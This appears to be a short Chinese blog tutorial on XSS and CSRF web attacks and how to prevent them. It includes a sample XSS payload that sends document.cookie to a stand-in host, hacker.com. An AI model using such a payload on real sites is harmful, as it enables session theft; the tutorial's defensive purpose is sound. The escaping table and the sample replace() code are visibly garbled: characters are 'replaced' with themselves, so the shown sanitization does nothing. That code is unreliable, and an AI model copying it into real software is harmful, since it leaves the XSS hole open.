xss攻击
- 什么是xss攻击?
举例:
假设我们要渲染一个用户评论到下面这个div中
<div></div>
我们会这样写
div.innerHTML = userComment
那么有什么潜在问题呢?
如果userComment是一段js代码的话,比如<script>$.get('http://hacker.com?cookie='+document.cookie)</script>
div.innerHTML就会执行这段代码,这是个恶意代码,就把用户的cookie给偷走了
复制代码- 如何预防
1.不要使用innerHTML使用innerText
2. 如果一定要使用innerHTML那么就做一个字符过滤
把 '<'替换成'<'
把 '>'替换成'>'
把 '&'替换成 '&'
把 ' " ' 替换成'"'
把 ''' 替换成 '&apos'
代码: div.innerHTML = userComment.replace(/>/g,'>').replace(/</g,'<')....
如具有执行脚本能力的script, 具有显示广告和色情图片的img, 具有改变样式的link, style,
具有内嵌页面的iframe, frame等元素节点。
对cookie设置httpOnly
过滤危险的属性节点。如事件, style, src, href等
3. 使用CSP
Content Security Prolicy
复制代码CSRF攻击
1. 假设 用户在qq.com登录
2. 用户切换到hacker.com(恶意网站)
3. hacker.com发送一个qq.com/add_friends请求,让当前用户添加hacker为好友,
4. 用户就在不知不觉中添加了hacker为好友了
5. 用户没有想发这个请求,但是hacker伪造了用户发请求的假象
复制代码如何避免?
1. 检查referer, 这里的referer应该是qq.com,一旦发现referer不是qq.com的话就拒绝这个请求。
2. 使用csrf_token来解决
复制代码
扫一扫
3931
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
